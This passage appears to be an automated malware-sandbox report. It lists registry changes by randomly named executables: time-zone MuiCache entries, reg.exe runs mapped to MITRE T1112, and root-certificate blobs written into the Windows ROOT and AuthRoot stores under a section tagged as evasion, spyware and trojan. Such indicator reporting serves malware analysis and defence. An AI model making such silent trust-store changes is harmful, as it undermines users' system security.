Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-21 = "Cape Verde Daylight Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time"	L5CCUbftxW_m2YwQJsnYTAsP.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exe

pid process

700 reg.exe
2256 reg.exe

pid	process
700	reg.exe
2256	reg.exe

Modifies system certificate store 2 TTPs 15 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

Processes:

patch.exeiunMWhqpwqIzRC4E9zVK4PBR.execsrss.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	iunMWhqpwqIzRC4E9zVK4PBR.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	iunMWhqpwqIzRC4E9zVK4PBR.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	iunMWhqpwqIzRC4E9zVK4PBR.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	iunMWhqpwqIzRC4E9zVK4PBR.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	iunMWhqpwqIzRC4E9zVK4PBR.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	iunMWhqpwqIzRC4E9zVK4PBR.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	iunMWhqpwqIzRC4E9zVK4PBR.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5b